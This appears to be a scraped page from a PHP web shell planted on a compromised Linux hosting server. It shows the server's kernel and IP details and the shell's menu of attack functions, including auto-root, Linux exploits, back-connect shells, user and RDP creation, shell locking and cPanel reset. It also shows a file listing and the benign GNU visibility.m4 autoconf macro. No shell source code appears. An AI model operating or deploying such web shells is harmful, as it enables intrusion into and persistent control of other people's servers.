Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.218.38.67
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
aclocal /
[ HOME SHELL ]
Name
Size
Permission
Action
argz.m4
2.56
KB
-rw-r--r--
bison-i18n.m4
1.88
KB
-rw-r--r--
codeset.m4
842
B
-rw-r--r--
extern-inline.m4
4.27
KB
-rw-r--r--
fcntl-o.m4
4.56
KB
-rw-r--r--
fontutil.m4
13.83
KB
-rw-r--r--
freetype2.m4
6.18
KB
-rw-r--r--
gettext.m4
15.49
KB
-rw-r--r--
glibc2.m4
830
B
-rw-r--r--
glibc21.m4
907
B
-rw-r--r--
gpg-error.m4
3.52
KB
-rw-r--r--
iconv.m4
9.06
KB
-rw-r--r--
intdiv0.m4
2.35
KB
-rw-r--r--
intl.m4
11.84
KB
-rw-r--r--
intldir.m4
917
B
-rw-r--r--
intlmacosx.m4
2.47
KB
-rw-r--r--
intmax.m4
1.1
KB
-rw-r--r--
inttypes-pri.m4
1.22
KB
-rw-r--r--
inttypes_h.m4
1020
B
-rw-r--r--
lcmessage.m4
1.33
KB
-rw-r--r--
lib-ld.m4
3.6
KB
-rw-r--r--
lib-link.m4
32.28
KB
-rw-r--r--
lib-prefix.m4
8.27
KB
-rw-r--r--
libgcrypt.m4
4.62
KB
-rw-r--r--
libtool.m4
279.78
KB
-rw-r--r--
libxml.m4
7.7
KB
-rw-r--r--
libxslt.m4
7.93
KB
-rw-r--r--
lock.m4
1.43
KB
-rw-r--r--
longlong.m4
4.63
KB
-rw-r--r--
ltdl.m4
26.42
KB
-rw-r--r--
ltoptions.m4
12.06
KB
-rw-r--r--
ltsugar.m4
4.27
KB
-rw-r--r--
ltversion.m4
690
B
-rw-r--r--
lt~obsolete.m4
5.98
KB
-rw-r--r--
mysql.m4
4.56
KB
-rw-r--r--
nls.m4
1.19
KB
-rw-r--r--
pkg.m4
7.15
KB
-rw-r--r--
po.m4
18.52
KB
-rw-r--r--
printf-posix.m4
1.54
KB
-rw-r--r--
progtest.m4
3.02
KB
-rw-r--r--
size_max.m4
2.99
KB
-rw-r--r--
stdint_h.m4
995
B
-rw-r--r--
threadlib.m4
14.8
KB
-rw-r--r--
uintmax_t.m4
1.09
KB
-rw-r--r--
visibility.m4
3.27
KB
-rw-r--r--
wchar_t.m4
818
B
-rw-r--r--
wint_t.m4
1.03
KB
-rw-r--r--
xsize.m4
406
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : visibility.m4
# visibility.m4 serial 5 (gettext-0.18.2) dnl Copyright (C) 2005, 2008, 2010-2016 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, dnl with or without modifications, as long as this notice is preserved. dnl From Bruno Haible. dnl Tests whether the compiler supports the command-line option dnl -fvisibility=hidden and the function and variable attributes dnl __attribute__((__visibility__("hidden"))) and dnl __attribute__((__visibility__("default"))). dnl Does *not* test for __visibility__("protected") - which has tricky dnl semantics (see the 'vismain' test in glibc) and does not exist e.g. on dnl Mac OS X. dnl Does *not* test for __visibility__("internal") - which has processor dnl dependent semantics. dnl Does *not* test for #pragma GCC visibility push(hidden) - which is dnl "really only recommended for legacy code". dnl Set the variable CFLAG_VISIBILITY. dnl Defines and sets the variable HAVE_VISIBILITY. AC_DEFUN([gl_VISIBILITY], [ AC_REQUIRE([AC_PROG_CC]) CFLAG_VISIBILITY= HAVE_VISIBILITY=0 if test -n "$GCC"; then dnl First, check whether -Werror can be added to the command line, or dnl whether it leads to an error because of some other option that the dnl user has put into $CC $CFLAGS $CPPFLAGS. AC_MSG_CHECKING([whether the -Werror option is usable]) AC_CACHE_VAL([gl_cv_cc_vis_werror], [ gl_save_CFLAGS="$CFLAGS" CFLAGS="$CFLAGS -Werror" AC_COMPILE_IFELSE( [AC_LANG_PROGRAM([[]], [[]])], [gl_cv_cc_vis_werror=yes], [gl_cv_cc_vis_werror=no]) CFLAGS="$gl_save_CFLAGS"]) AC_MSG_RESULT([$gl_cv_cc_vis_werror]) dnl Now check whether visibility declarations are supported. AC_MSG_CHECKING([for simple visibility declarations]) AC_CACHE_VAL([gl_cv_cc_visibility], [ gl_save_CFLAGS="$CFLAGS" CFLAGS="$CFLAGS -fvisibility=hidden" dnl We use the option -Werror and a function dummyfunc, because on some dnl platforms (Cygwin 1.7) the use of -fvisibility triggers a warning dnl "visibility attribute not supported in this configuration; ignored" dnl at the first function definition in every compilation unit, and we dnl don't want to use the option in this case. if test $gl_cv_cc_vis_werror = yes; then CFLAGS="$CFLAGS -Werror" fi AC_COMPILE_IFELSE( [AC_LANG_PROGRAM( [[extern __attribute__((__visibility__("hidden"))) int hiddenvar; extern __attribute__((__visibility__("default"))) int exportedvar; extern __attribute__((__visibility__("hidden"))) int hiddenfunc (void); extern __attribute__((__visibility__("default"))) int exportedfunc (void); void dummyfunc (void) {} ]], [[]])], [gl_cv_cc_visibility=yes], [gl_cv_cc_visibility=no]) CFLAGS="$gl_save_CFLAGS"]) AC_MSG_RESULT([$gl_cv_cc_visibility]) if test $gl_cv_cc_visibility = yes; then CFLAG_VISIBILITY="-fvisibility=hidden" HAVE_VISIBILITY=1 fi fi AC_SUBST([CFLAG_VISIBILITY]) AC_SUBST([HAVE_VISIBILITY]) AC_DEFINE_UNQUOTED([HAVE_VISIBILITY], [$HAVE_VISIBILITY], [Define to 1 or 0, depending whether the compiler supports simple visibility declarations.]) ])
Close